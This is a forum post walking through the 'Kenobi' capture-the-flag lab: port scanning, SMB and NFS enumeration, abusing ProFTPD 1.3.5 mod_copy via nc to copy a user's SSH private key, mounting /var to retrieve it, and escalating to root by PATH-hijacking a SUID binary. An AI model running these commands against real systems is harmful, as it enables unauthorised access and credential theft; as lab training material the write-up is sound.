MrSynox

Owner
owner
Katılım
25 Nis 2021
Mesajlar
207
Reaction score
887
Puanları
93
1637239321135.png
  • Room: Kenobi
  • Target OS: Linux
  • Difficulty: Easy
  • Info: Walkthrough on exploiting a Linux machine. Enumerate Samba for shares, manipulate a vulnerable version of proftpd and escalate your privileges with path variable manipulation.
  • Services: SSH (22), FTP (21), HTTP (80), SMB (139, 445), NFS (2049), 111 (RPCBind)
Contents

  • Getting user
  • Getting root



Reconnaissance​

As always, the first step consists of the reconnaissance phase as port scanning.


Ports Scanning​

During this step, we’re gonna identify the target to see what we have behind the IP Address.

Kod:
nmap -sC -sV -oA nmap 10.10.76.169

1637239483852.png

Kod:
21/tcp   open  ftp         ProFTPD 1.3.5                                                                                                                   
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)                                                                   
| ssh-hostkey:                                                                                                                                             
|   2048 b3:ad:83:41:49:e9:5d:16:8d:3b:0f:05:7b:e2:c0:ae (RSA)                                                                                             
|   256 f8:27:7d:64:29:97:e6:f8:65:54:65:22:f7:c8:1d:8a (ECDSA)                                                                                           
|_  256 5a:06:ed:eb:b6:56:7e:4c:01:dd:ea:bc:ba:fa:33:79 (ED25519)                                                                                         
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))                                                                                                 
| http-robots.txt: 1 disallowed entry                                                                                                                     
|_/admin.html                                                                                                                                             
|_http-server-header: Apache/2.4.18 (Ubuntu)                                                                                                               
|_http-title: Site doesn't have a title (text/html).                                                                                                       
111/tcp  open  rpcbind     2-4 (RPC #100000)                                                                                                               
| rpcinfo:                                                                                                                                                 
|   program version    port/proto  service                                                                                                                 
|   100000  2,3,4        111/tcp   rpcbind                                                                                                                 
|   100000  2,3,4        111/udp   rpcbind                                                                                                                 
|   100000  3,4          111/tcp6  rpcbind                                                                                                                 
|   100000  3,4          111/udp6  rpcbind                                                                                                                 
|   100003  2,3,4       2049/tcp   nfs                                                                                                                     
|   100003  2,3,4       2049/tcp6  nfs                                                                                                                     
|   100003  2,3,4       2049/udp   nfs                                                                                                                     
|   100003  2,3,4       2049/udp6  nfs                                                                                                                     
|   100005  1,2,3      34756/udp6  mountd                                                                                                                 
|   100005  1,2,3      44257/tcp   mountd                                                                                                                 
|   100005  1,2,3      51100/udp   mountd
|   100005  1,2,3      55287/tcp6  mountd
|   100021  1,3,4      33261/tcp6  nlockmgr
|   100021  1,3,4      33483/udp6  nlockmgr
|   100021  1,3,4      39915/tcp   nlockmgr
|   100021  1,3,4      58341/udp   nlockmgr
|   100227  2,3         2049/tcp   nfs_acl
|   100227  2,3         2049/tcp6  nfs_acl
|   100227  2,3         2049/udp   nfs_acl
|_  100227  2,3         2049/udp6  nfs_acl
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
2049/tcp open  nfs_acl     2-3 (RPC #100227)

Enumerating Port 80​

If we browser URL:80 we’ll get an image as a background.



http

Page Source

1637239527020.png


There’s nothing but the image let’s do some recon and search for hidden files or directories.


Gobuster

Kod:
gobuster -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt -u http://10.10.76.169/ -s '200,204,301,307,403,500' 2>/dev/null

1637239574797.png
Unfortunately, we couldn’t find anything could be a rabbit hole.


















Enumerating SMB​

We can do our initial scan of SMB shares with Nmap.

Kod:
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.76.169


1637239606487.png
Kod:
smbmap -H 10.10.167.97


1637239651697.png

Kod:
smbclient //10.10.167.97/anonymous -N

1637239663085.png


You can recursively download the SMB share too.

Kod:
smbget -R smb://10.10.167.97/anonymous -a

1637239697969.png

Kod:
nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.167.97

1637239749311.png



















Enumerating Port 21​

We know the version already through Nmap scanning (ProFTPD 1.3.5) .

If we search for the exploits.


Kod:
searchsploit ProFTPD 1.3.5

1637239787016.png

We see an exploit from ProFTPD’s mod_copy module, which will let us use the SITE CPFR and SITE CPTO commands to copy anything we want. We want to gain access to the box, so we will attempt to copy kenobi’s SSH keys so that we can access the box as him.

ProFtpd’s mod_copy module 52

We copied id_rsa to /var/tmp because we know that we have access to /var, and can mount it onto our system. Mount /var using the following commands:

Kod:
nc 10.10.167.97 21
SITE CPFR /home/kenobi/.ssh/id_rsa
SITE CPTO /var/tmp/id_rsa

1637239807823.png
So we’ve now moved Kenobi’s private key to the /var/tmp directory.

Let’s mount the /var



1637239822570.png

We can copy the id_rsa to our local machine to access ssh.

1637239833207.png

And we got the SSH access.



ssh

Let’s find our user.txt flag.

Kod:
find / -name user.txt 2>/dev/null

1637239858459.png

Privilege Escalation

Let’s go for root now!

Kod:
find / -type f -perm -u=s 2>/dev/null

1637239879254.png
We have to look for the odd file here like, /usr/bin/menu. If we run the binary we get this output with 3 options to select.

1637239893580.png


If we select the first option of ‘status check’






1637239907943.png




It’s executing curl from /usr/bin/curl







1637239984131.png
We can manipulate the path to gain root.

Kod:
echo /bin/sh > curl
chmod 777 curl
export PATH=/tmp:$PATH
/usr/bin/menu

1637240008588.png









And we got the root!

1637240025492.png


the end
 

Ekli dosyalar

  • 1637240017818.png
    1637240017818.png
    20.6 KB · Görüntüleme: 0
Üst